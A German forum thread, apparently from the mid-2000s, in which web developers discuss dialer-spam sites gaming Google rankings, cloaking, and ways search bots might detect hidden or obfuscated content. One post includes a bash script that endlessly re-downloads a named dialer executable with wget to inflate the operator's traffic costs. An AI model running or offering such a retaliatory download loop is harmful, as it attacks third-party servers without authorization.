                  Der Name Markus Tjoa kommt mir irgendwie in dem Zusammenhang bekannt vor. Ich hab jetzt leider keine Zeit für tiefgründigere Recherchen, aber der Ball wurde ja jetzt ins Rollen gebracht... In ein paar Tagen hab ich wieder mehr Zeit, mal sehen wie sich das bis dahin entwickelt hat. Mir ist die Kfz. Sache nämlich vor ein paar Tagen aufgefallen als ich feststellen musste, dass besagte Seiten aus dem Nichts aufgetaucht sind und nur Blödsinn präsentieren. Wären das Seiten, die einfach vom Inhalt gut sind, wäre das Ranking ok, aber so nicht.

                  cu
                  unknown

                  1. Einen noch: Klickt man bei http://www.myindex.de/ auf Suchmaschineneintrag und danach auf einen der Folgelinks, landet man wieder bei besagtem Dialer (also Vorsicht bitte, hab auch keine Ahnung ob man sich den so einfängt, da ich nicht mit Win unterwegs bin).

                    cu
                    unknown

                    1. Hi und guten Abend!

                      Einen noch: Klickt man bei http://www.myindex.de/ auf Suchmaschineneintrag und danach auf einen der Folgelinks, landet man wieder bei besagtem Dialer (also Vorsicht bitte, hab auch keine Ahnung ob man sich den so einfängt, da ich nicht mit Win unterwegs bin).

                      Mit einem anständig konfigurierten Windows (kein ActiveX, kein ungefragtes Öffnen von Dateien) kein Problem.

                      Abgesehen davon benutzen die ausnahmsweise einen vorschriftsgemäßen Dialer, der erst die Eingabe von "OK" (in Buchstaben) fordert, bevor irgendwas geht.

                      Ciao,

                      Martin

                      1. Hallo Der.

                        Abgesehen davon benutzen die ausnahmsweise einen vorschriftsgemäßen Dialer, der erst die Eingabe von "OK" (in Buchstaben) fordert, bevor irgendwas geht.

                        BTW: Was passiert eigentlich, wenn ich mit meinem DSL-Zugang dort "OK" eingebe? Eigentlich dürfte ja garnichts passieren, da ich mich ja nicht über ein übliches Modem einwähle.

                        Selbst ausprobieren wollte ich es bisher aber noch nicht...

                        Gruß, Ashura

                        --
                        Selfcode: sh:( fo:) ch:? rl:( br:^ n4:& ie:{ mo:) va:) de:> zu:) fl:( ss:( ls:# js:|
                        1. Hallo,

                          BTW: Was passiert eigentlich, wenn ich mit meinem DSL-Zugang dort "OK" eingebe? Eigentlich dürfte ja garnichts passieren, da ich mich ja nicht über ein übliches Modem einwähle.

                          Das ist auch korrekt.
                          Und es ist ein Grund mehr, warum ich solchen Bedrohungen relativ gelassen gegenüberstehe. Eine DSL-Verbindung ist für einen Dialer (der sogar meistens exklusiv für Windows geschrieben ist), praktisch unangreifbar. Erst recht dann, wenn die eigentliche Verbindung zum Netz über einen Router hergestellt wird, in dem die Zugangsdaten fest hinterlegt sind.

                          Selbst ausprobieren wollte ich es bisher aber noch nicht...

                          Nur Mut...  ;)
                          Gute Nacht,

                          Martin

                          1. Das ist auch korrekt.
                            Und es ist ein Grund mehr, warum ich solchen Bedrohungen relativ gelassen gegenüberstehe. Eine DSL-Verbindung ist für einen Dialer (der sogar meistens exklusiv für Windows geschrieben ist), praktisch unangreifbar. Erst recht dann, wenn die eigentliche Verbindung zum Netz über einen Router hergestellt wird, in dem die Zugangsdaten fest hinterlegt sind.

                            Auch Router sind angreifbar und können auf ISDN-Einwahl oder Analogeinwahl umgestellt werden. Das nur am Rande. Man sollte sich nie zu sicher sein. Zum Thema: Die nächste Abzockwelle naht bereits. Zum Glück noch nicht in Deutschland, aber die Jungs lassen sich immer neue Dinge einfallen:
                            http://blog.koehntopp.de/archives/711-Dialerwahn-die-naechste-Phase.html

                            cu
                            unknown

                            1. Moin!

                              Auch Router sind angreifbar ...

                              Natürlich. Im gleichen Maß, wie jede technische Einrichtung angreifbar ist.

                              ... und können auf ISDN-Einwahl oder Analogeinwahl umgestellt werden.

                              Ja, es gibt solche. Ich hatte anfangs mal eine Eumex 704, die ist ISDN-Telefonanlage und Router in einem, und die nimmt sich die Freiheit, die Internet-Verbindung automatisch über ISDN herzustellen, wenn's über DSL mal nicht klappt. Dieses Fallback kann man aber abstellen.

                              Ansonsten sind über einen gewöhnlichen DSL-Router, wie er mittlerweile in Millionen Haushalten verwendet wird, keine ISDN-Verbindungen möglich.
                              Denkbar wäre aber, dass eine "bösartige" Software die im Router hinterlegten Zugangsdaten manipuliert und so einen teuren Zugang über einen anderen Provider herstellt. Aber auch das ist (fast) nicht mehr möglich, wenn die Konfigurationsdaten mit einem Kennwort abgesichert sind.

                              So long,

                              Martin

          1. Hi,

            Was verwendet Google für eine User-Agent-Kennung?

            Kann das mal jemand mit einem entsprechend konfigurierbaren Browser probieren?

            wozu? die Kennung spielt doch auf professionell "optimierten" Seiten absolut keine Rolle - die gehen nach der IP und liefern hiernach Spezialinhalte aus.

            freundliche Grüße
            Ingo

            1. Hallo,

              wozu? die Kennung spielt doch auf professionell "optimierten" Seiten absolut keine Rolle - die gehen nach der IP und liefern hiernach Spezialinhalte aus.

              Ja, oder oder...

              Die Frage ist aber: Was _tut_ Google, um seine _eigenen_ Richtlinien http://www.google.com/webmasters/faq.html#cloaking durchzuetzen? Und jetzt erzähl mir nicht, dass man die Betreiber von solchen "Diensten" nicht erkennen und _wirksam_ aus dem Index verbannen kann, so man will.

              viele Grüße

              Axel

              1. Hi Axel,

                Du beharrst sehr auf dem Verdacht, dass Absicht hinter diesen Google-Trends steckt. Ich wage das nicht zu beurteilen, obwohl es sicher um sehr viel Geld geht bei den Dialer-Anbietern.

                Die Frage ist natürlich, wie das Netz von Verweisseiten zustande kommt, ob zentral geplant und organisiert, oder ob durch das "Partnerprogramm" immer wieder neue Loser dazukommen, die sich da einklinken. Weiterhin ist für Google die zentrale Frage, wie diese Sache _automatisch_ zu bekämpfen ist, und das ist eaus meiner Sicht eine Grundfrage für alle Suchmaschinen. Ich zweifle sehr, ob das so ohne weiteres automatisierbar ist.

                Was mir verdächtig erscheitn, dass auch die Top-Domain der Spammer in den Auskünften vorkommt, die ja eindeutig als Spam- und Dialerschleuder zu identifizieren ist.

                Viele Grüße
                Mathias Bigge

                1. Hallo,

                  Du beharrst sehr auf dem Verdacht, dass Absicht hinter diesen Google-Trends steckt. Ich wage das nicht zu beurteilen, obwohl es sicher um sehr viel Geld geht bei den Dialer-Anbietern.

                  Absicht steckt mit Sicherheit dahinter. Ob Google da involviert ist, kann ich auch nicht beurteilen. Es fällt aber auf, dass eben Googles Richtlinien und Direktiven hier nicht greifen, obwohl Ross und Reiter durchaus bekannt sind.

                  Die Frage ist natürlich, wie das Netz von Verweisseiten zustande kommt, ob zentral geplant und organisiert, oder ob durch das "Partnerprogramm" immer wieder neue Loser dazukommen, die sich da einklinken.

                  http://www.at-web.de/google/prad.htm
                  http://www.pandia.com/features/pagerank.html

                  Weiterhin ist für Google die zentrale Frage, wie diese Sache _automatisch_ zu bekämpfen ist, und das ist eaus meiner Sicht eine Grundfrage für alle Suchmaschinen. Ich zweifle sehr, ob das so ohne weiteres automatisierbar ist.

                  Mit weiterem ist es aber automatisierbar. Meiner Meinung nach ist "für Google die zentrale Frage" mittlerweile, ob und wie schnell sie es schaffen, solchen "Diensten" und "Anbietern" die Werbung über erste Plätze in ihren Sucherebnissen zu entziehen, weil sie sonst selbst in den Geruchs- und Dunstkreis solcher "Dienste" und "Anbieter" geraten.

                  Was mir verdächtig erscheitn, dass auch die Top-Domain der Spammer in den Auskünften vorkommt, die ja eindeutig als Spam- und Dialerschleuder zu identifizieren ist.

                  eben ;-))

                  viele Grüße

                  Axel

              2. Hi,

                Die Frage ist aber: Was _tut_ Google, um seine _eigenen_ Richtlinien http://www.google.com/webmasters/faq.html#cloaking durchzuetzen?

                zu wenig. Allein die Tatsache, daß noch nicht einmal an der genannte Stelle in den faq en Link auf http://www.google.de/webmasters/spamreport.html gesetzt ist, sondern dieser Link wirklich gut versteckt ist. Helfen würde da schon ein Link hierhin auf jeder Suchseite. Hier könnte analog zu den Tips auch ein Hinweis auf Mithilfe zur Qualitätssicherung stehen - wenn das denn gewollt wäre...
                Wie ich schon gelesen hatte, scheint zumindest Google.de nicht besondrs an spam-Reports interessiert zu sein. Aber man kann ja mal einen Test machen und einige Seiten melden; ich fürchte, die fliegen nicht so schnell raus - wenn überhaupt.

                freundliche Grüße
                Ingo

                1. Hi Ingo,

                  Aber man kann ja mal einen Test machen und einige Seiten melden; ich fürchte, die fliegen nicht so schnell raus - wenn überhaupt.

                  Ich habe diesen ganzen Hausaufgaben-Quatsch eingetragen, mal sehen, ob was passiert.

                  Viele Grüße
                  Mathias Bigge

                  1. Hi,

                    Aber man kann ja mal einen Test machen und einige Seiten melden; ich fürchte, die fliegen nicht so schnell raus - wenn überhaupt.
                    Ich habe diesen ganzen Hausaufgaben-Quatsch eingetragen, mal sehen, ob was passiert.

                    sehr schön. Halte uns doch bitte auf dem Laufenden.

                    Ich hatte zu Ostern selbst mal nach einer bestimmten Sache gesucht und auf der ersten Seite fast ausschließlich (meta- und JS-) Weiterleitungen zu einer SPAM-Seite bekommen, die ich dann auch gemeldet hatte. Leider habe ich vergessen, worum es da ging. :-(

                    freundliche Grüße
                    Ingo

  10. Hi,

    abgesehen davon, dass ich der Meinung bin, dass Google immer noch qualitativ die besten Ergebnisse liefert und auch dieses Problem über kurz oder lang in den Griff bekommen wird, kotzen mich solche Spammereien ebenfalls an, erst recht, wenn sie in Verbindung mit 'nem Dialer stehen wie bei der hier erwähnten Seite.

    Nunja, zum Teil sind die Ideen dieser Leute recht interessant. Eine Seite, die seit ein paar Tagen bei Google an erster Stelle auftaucht (die anderen SuMas sind immer etwas langsamer, ist aber nur eine Frage der Zeit) ist folgende:

    • Suche nach: kfz gebraucht händler
    • das erste Ergebnis einmal mit und einmal ohne aktiviertem Java Script anklicken
    • beim Anklicken ohne Java Script bitte mal den Text der Links durchlesen

    Ihr werdet schnell feststellen, dass dort einfach Bruchstücke aus Foren per Spider gesammelt und sinnlos aneinander gereiht werden. Das geschieht mit immer mehr Suchkombis aus diesem Bereich. Es tauchen immer wieder Links auf, die mit ***.joboter.ch beginnen. Das krasseste (finde ich jetzt auf die Schnelle nicht; kam nur über zahlreiche Quelltextleserei und Aufrufen der darin enthaltenen vor dem Nutzer versteckten Links heraus) war dann eine Seite, die in einem iframe, den kompletten Autoscout24 oder Motoscout24 Inhalt darstellte, sodass man dachte man befände sich auf deren Seite, was mit Sicherheit gegen deren Nutzungsbedingungen verstößt, und im Hintergrund die üblichen Schweinereien trieb.

    Was kann man dagegen tun?

    • Man kann seine eigenen Seiten optimieren und gute Inhalte anbieten. Dann wird man auf die Dauer besser dastehen, weil solche Spammseiten früher oder später aus dem Index verschwinden. War schon oft genug der Fall. Problem: Es dauert.
    • Die Seiten bei Google usw. melden. Problem: dauert ebenfalls und man bekommt oft nur Robotmails zurück.
    • Für solche wie den gerade erwähnten Fall (Autoscout) den Seitenbetreiber der Originalseite informieren und hoffen, dass er rechtliche Schritte unternimmt.

    Das alles hat sich immer wieder als sehr langwierige Angelegenheit gezeigt und ist mit einer Menge Arbeit verbunden und eventuellen Kosten, wenn man selber rechtliche Schritte unternehmen will.

    Was bleibt einem somit übrig?
    Ein zuverlässiger Freund mit Namen wget, der sich in der Vergangenheit schon oft sehr nützlich gezeigt hat (es gibt natürlich auch andere Freunde (z.B. ähnliche Tools oder Browser mit einer automatischen Reloadfunktion), die dazu in der Lage sind). Damit trifft man solche Leute dort wo sie am empfindlichsten sind: man verursacht Kosten, indem man Traffic verursacht, den sie ja schließlich haben wollen. im ed2k.-Netzwerk wurden so z.B. ekelfilme, die Dialerclients anboten, schnell eines besseren belehrt.

    Ich hab' keine Ahnung ob das rechtlich ok ist und möchte auch niemanden dazu aufrufen dies zu tun, aber Mitlesen in anderen Boards hat gezeigt, dass sowas bisher gegen Dialersoftware sehr wirkungsvoll war und nach Meinug vieler auch nicht illegal ist. Da ich kein Anwalt bin, kann ich dazu nichts sagen und distanziere mich ausdrücklich davon. Es wird immer so oder ähnlich argumentiert: Die Seite bietet etwas an von dem sie möchten, dass man es herunterlädt, also laden wir es herunter. Wie oft ist egal.

    Folgendes wget-Script für Linux (wget gibt es auch für Win) erledigt das für den von Mathias erwähnten Dialer und limitiert die Bandbreite auf 30k, damit man noch andere Dinge machen kann, wenn man DSL hat. Kann natürlich angepasst werden. Meistens ändern die Admins solcher Server irgendwann die URL, die man dann wieder anpassen muss. Die Datei muss dann nur noch ausführbar gemacht und aufgerufen werden.

    #!/bin/bash
    count=0
    while (a=1)
    do
    let count+=1
    echo "count: "$count
    wget --cache=off --limit-rate=30k -r http://gn.one2bill.de/soft/de_drop/rev1/gn.exe
    done;

    cu
    unknown

    1. Hi unknown,

      Danke für Deine ausführliche Darstellung.

      Was kann man dagegen tun?

      Auf der Basis könnte man vielleicht wirklich mal einen Tipp an die gekaperten Autoseiten geben.

      Was bleibt einem somit übrig?
      Ein zuverlässiger Freund mit Namen wget, der sich in der Vergangenheit schon oft sehr nützlich gezeigt hat (es gibt natürlich auch andere Freunde (z.B. ähnliche Tools oder Browser mit einer automatischen Reloadfunktion), die dazu in der Lage sind). Damit trifft man solche Leute dort wo sie am empfindlichsten sind: man verursacht Kosten, indem man Traffic verursacht, den sie ja schließlich haben wollen. im ed2k.-Netzwerk wurden so z.B. ekelfilme, die Dialerclients anboten, schnell eines besseren belehrt.

      Auch eine interessante Möglichkeit, ist mir aber zu anstrengend.

      Die Seite bietet etwas an von dem sie möchten, dass man es herunterlädt, also laden wir es herunter. Wie oft ist egal.

      *g*
      Interessante Möglichkeit...

      Viele Grüße
      Mathias Bigge

    2. hi,

      Ich hab' keine Ahnung ob das rechtlich ok ist und möchte auch niemanden dazu aufrufen dies zu tun, aber Mitlesen in anderen Boards hat gezeigt, dass sowas bisher gegen Dialersoftware sehr wirkungsvoll war und nach Meinug vieler auch nicht illegal ist. [...] Es wird immer so oder ähnlich argumentiert: Die Seite bietet etwas an von dem sie möchten, dass man es herunterlädt, also laden wir es herunter. Wie oft ist egal.

      im heise-forum auch als "liebheisen" bekannt.

      Da ich kein Anwalt bin, kann ich dazu nichts sagen und distanziere mich ausdrücklich davon. [...]
      Folgendes wget-Script für Linux (wget gibt es auch für Win) erledigt das für den von Mathias erwähnten Dialer und limitiert die Bandbreite auf 30k, [...]

      "natürlich distanziere ich mich von deinem vorhaben, xy umzubringen.
      aber wenn du da und dort mit einem langen messer zustichst, verreckt er am schönsten ..."

      *g*

      gruß,
      wahsaga

      --
      "Look, that's why there's rules, understand? So that you _think_ before you break 'em."
  11. Hallo Mathias Bigge

    Hi alle,

    meiner Meinung nach haben sich die Suchergebnisse von google in der letzten Zeit so dramatisch verschlechtert, dass ich überlege auf eine andere Suchmaschine umzusteigen.

    ist schon interessant was da alles dahinter steckt.

    vor ca. einem halben Jahr war ich auf der Suche nach Kochrezepten und hatte nur Seiten mit Dialern gefunden (natürlich alles die gleichen). Ich habe damals google dann mehrere Links gemeldet und mittlerweile ist das Ergebnis (gecheckt auf die schnelle) auch sauber.

    Wenn die mit Tricks arbeiten dauert es wohl ein bisschen länger solche Anbieter zu entfernen. Zumal der hausaufgaben.de Anbieter extrem aktiv ist, die Domain ist ja auch gar nicht im Index. Letztlich kann google da nur hinterher laufen solange es möglichkeiten gibt den suchroboter auszutricksen.

    Struppi.

  12. hi,

    wie hier im thread-verlauf auch schon einige male angesprochen, sehe auch ich das hauptproblem darin, dass die SuMa-bots sich so leicht "ein x für ein u vormachen" lassen - sprich die server der spammer erkennen die bots, an UA-string, IP-adressrange oder was-auch-immer, und bieten diesen anderes "futter" als meinem browser, wenn ich die seite besuche.

    sich hinter bekannten UAs zu verstecken, sollte für die bots kein problem sein - aber bei festen IP-bereichen ist es eben auch kein großes für die spammer, sie trotzdem zu erkennen.

    an genau der stelle müsste man also m.E. ansetzen:

    wenn die spammer SuMa-bots von "gewöhnlichen" besuchern unterscheiden - ja warum denn dann nicht den "gewöhnlichen" besucher beim spidern helfen lassen?

    ich könnte mir da distributed computing-anwendungen vorstellen, analog zu seti@home halt ein google@home.

    ich als user stelle google einen teil meiner bandbreite und der leerlaufzeit meines rechners zur verfügung - wie und auf welche weise mich google dafür entlohnen könnte, lassen wir erst mal dahingestellt.
    vom google-server bekommt mein client mitgeteilt, welchen URL er untersuchen soll - und liefert dann nach abruf der seite entweder gleich ein nach googles algorithmen gespidertes ergebnis, oder - falls google das zu "riskant" sein sollte - lediglich den ermittelten seitenquelltext zurück.
    natürlich müsste man das über kodierung/prüfsummenverfahren etc. absichern, damit nicht die spammer ihrerseits über eigene clients google falsche ergebnisse melden und somit wiederum einfluss nehmen können. (ich weiß, hier liegt die schwachstelle, mit der das ganze modell steht oder fällt.)

    damit dürften doch m.E. die chancen der spammer, anhand der anfragenden IP auf einen SuMa-bot zu schließen, geringer werden ...

    wie sind eure meinungen zu diesem konzept?

    gruß,
    wahsaga

    --
    "Look, that's why there's rules, understand? So that you _think_ before you break 'em."
    1. 你好 wahsaga,

      die Idee halte ich prinzipiell nicht fuer schlecht. Ich moechte jedoch noch
      etwas anderes vorschlagen:

      1. Hatte ich mir ueber diese Problematik auch schon Gedanken gemacht
        allerdings dabei dann eher an das Anonymizer-Netzwerk gedacht. Das ist ja
        eine recht gute Methode, Requests zu anonymisieren.

      Dann hatte ich weiterhin daran gedacht, CSS, HTML und JavaScript
      auszuwerten. Denn dadurch koennte man viele Spam-Versuche schonmal von
      vornherein zum Scheitern verurteilen, z. B. das hier:

      http://www.bhm.de/

      Dort ist versteckter Inhalt auf der Seite, der wuerde aus dem Index
      rausfliegen. In dritter Punkt, der in meine Bewertungskriterien
      hineinfliessen wuerde, waere die Validitaet des Dokumentes -- IMHO ein
      Anhaltspunkt, der etwas ueber die Muehe aussagt, die sich der Autor mit
      dieser Seite gemacht hat.

      再见,
      CK

      1. hi,

        In dritter Punkt, der in meine Bewertungskriterien
        hineinfliessen wuerde, waere die Validitaet des Dokumentes -- IMHO ein
        Anhaltspunkt, der etwas ueber die Muehe aussagt, die sich der Autor mit
        dieser Seite gemacht hat.

        hey, mich könntest du davon fast sofort überzeugen :-)

        aber mal ernsthaft: auch eine seite, die in den SuMas nach oben gespamt werden soll, können diese leute sicherlich valide erstellen. mag etwas mehr aufwand bedeuten - aber dass die typen idR. nun nicht gerade blutige anfänger sein werden, steht für mich fest.

        ergebnis wäre denn vermutlich, dass du den spammern etwas mehr mühe bereitet hast - dafür aber zahlreiche seiten mit wirklich _guten_ informationen, die leider von weniger "guten" seitenerstellern ins netz gebracht wurden, im ranking abrutschen würden ... und damit schaffst du "an der spitze" noch mehr platz für die seiten der spammer.

        gruß,
        wahsaga

        --
        "Look, that's why there's rules, understand? So that you _think_ before you break 'em."
        1. 你好 wahsaga,

          aber mal ernsthaft: auch eine seite, die in den SuMas nach oben gespamt
          werden soll, können diese leute sicherlich valide erstellen.

          Sicher, aber die verwenden ja immernoch so lustige Sachen wie versteckten
          Inhalt. Das floesse _sehr_ negativ in die Bewertung ein.

          dafür aber zahlreiche seiten mit wirklich _guten_ informationen, die
          leider von weniger "guten" seitenerstellern ins netz gebracht wurden, im
          ranking abrutschen würden ...

          Das waere Pech fuer die Seitenhersteller. Valide ist nun wirklich fast alles
          zu kriegen.

          再见,
          CK

      2. Hi Christian,

        Dann hatte ich weiterhin daran gedacht, CSS, HTML und JavaScript auszuwerten. Denn dadurch koennte man viele Spam-Versuche schonmal von vornherein zum Scheitern verurteilen

        Nachdem ich mir den Quelltext einiger Spam-Seiten angesehen habe, halte ich das auch für wichtig, habe aber auch etwas gelernt, was früheren Asukünften im Selfraum widerspricht: Selbst die einfachste String-Zerlegung scheint für die BOTs doch schwerer zu knacken sein als angenommen. Wir hatten das hier im Forum mehrfach diskutiert, etwa in Bezug auf das Verbergen von e-Mail-Adressen durch Stringzerlegung per JS. Nicht dass ich etwas davon halten würde, aber damals war der einfache Tenor, dass die BOTs das längst im Griff hätten.

        In den Quelltexten, die ich mir angeschaut habe, habe ich vor allem simple String-Zerlegungen per JS als Tarnung gefunden, über die dann eine Weiterleitung oder ein Link aufgebaut wurde. Du kannst besser beurteilen als ich, ob das ohne weiteres zu knacken wäre, oder ob man da auf Schwierigkeiten stößt. Also:

        • Könnte man nicht ein simples Script in Perl oder C schreiben, dass die JS-Stringzerlegung auflöst und den Klartext zur Verfügung stellt?
        • Würde das die Performance des Google Bots zerstören, der ja Millionen Seiten durchlaufen muss?
        • Könnte man da optimieren, indem man JS-Scripte zunächst grob auf bestimmte Codes scannt, um etwa nicht an einem Dreamweaver-Bildwechsel-Dingen ein längeres Päuschen einlegen zu müssen?

        Vielleicht bin ich auch ganz auf der falschen Spur, viellleicht siehst Du viel bessere Möglichkeiten, da heran zu gehen?

        Dort ist versteckter Inhalt auf der Seite, der wuerde aus dem Index rausfliegen.

        Versteckter Inhalt wäre für mich auch ein klares Abwertungskriterium.

        Das mit der Validität halte ich für wenig nützlich, es würde lediglich garantieren, dass die Spammer noch vor Google valide Seiten präsentieren würden. Keiner der Mechanismen, die ich in den Quelltexten gesehen habe, erfordert prinzipiell eine Verletzung der Kriterien für Validität.

        Prinzipiell finde ich auch wahsagas Idee faszinierend, wäre selbst aber nicht bereit, auf diesem Wege eine Firma zu unterstützen, es müsste dann schon ein Open Source Projekt sein.

        Viele Grüße
        Mathias Bigge

        1. 你好 Mathias,

          • Könnte man nicht ein simples Script in Perl oder C schreiben, dass die
            JS-Stringzerlegung auflöst und den Klartext zur Verfügung stellt?

          Selbstverstaendlich -- Browser koennen das ja auch.

          • Würde das die Performance des Google Bots zerstören, der ja Millionen
            Seiten durchlaufen muss?

          Es wuerde einiges an Rechenzeit kosten, ja. Aber das kostet es sowieso,
          und Google hat ja die Kapazitaeten.

          • Könnte man da optimieren, indem man JS-Scripte zunächst grob auf
            bestimmte Codes scannt, um etwa nicht an einem
            Dreamweaver-Bildwechsel-Dingen ein längeres Päuschen einlegen zu müssen?

          So ein Bot muesste richtig[tm] rendern koennen. Er muss ja auch erkennen
          koennen, wenn Texte wg. dynamischer Menues oder dergleichen ausgeblendet
          werden. Das ist keine triviale Aufgabe.

          再见,
          CK

      3. Hi,

        Dort ist versteckter Inhalt auf der Seite, der wuerde aus dem Index
        rausfliegen.

        Hm. Der versteckte Text (nicht im gegebenen Beispiel, sondern allgemein) könnte aber auch anfangs versteckt und nur bei bestimmten Useraktionen angezeigt werden. Ist das auch noch ein Ausschlußkriterium?

        Außerdem gibt es verschiedene Methoden, Text zu verstecken:
        einfach ein nicht-transparentes div drüberlegen,
        oder Vordergrundfarbe gleich Hintergrundfarbe,
        oder visibility:hidden,
        oder display:none
        oder overflow:hidden
        oder ...

        cu,
        Andreas

        --
        Warum nennt sich Andreas hier MudGuard?
        Schreinerei Waechter
        Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
        1. 你好 MudGuard,

          Dort ist versteckter Inhalt auf der Seite, der wuerde aus dem Index
          rausfliegen.

          Hm. Der versteckte Text (nicht im gegebenen Beispiel, sondern allgemein)
          könnte aber auch anfangs versteckt und nur bei bestimmten Useraktionen
          angezeigt werden. Ist das auch noch ein Ausschlußkriterium?

          Das muesste erkannt werden (kann ja auch).

          Außerdem gibt es verschiedene Methoden, Text zu verstecken:
          einfach ein nicht-transparentes div drüberlegen,
          oder Vordergrundfarbe gleich Hintergrundfarbe,
          oder visibility:hidden,
          oder display:none
          oder overflow:hidden
          oder ...

          Jo, ist mir schon klar. So ein Bot muesste halt wirklich rendern koennen.

          再见,
          CK

          1. Hi,

            Jo, ist mir schon klar. So ein Bot muesste halt wirklich rendern koennen.

            und muß auch OCR können, um aus dem gerenderten Bild erkennen zu können, was tatsächlich als sichtbarer Text am Ende übrigbleibt ...

            cu,
            Andreas

            --
            Warum nennt sich Andreas hier MudGuard?
            Schreinerei Waechter
            Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
            1. 你好 MudGuard,

              Jo, ist mir schon klar. So ein Bot muesste halt wirklich rendern koennen.

              und muß auch OCR können, um aus dem gerenderten Bild erkennen zu können,
              was tatsächlich als sichtbarer Text am Ende übrigbleibt ...

              Na, man kanns auch uebertreiben.

              再见,
              CK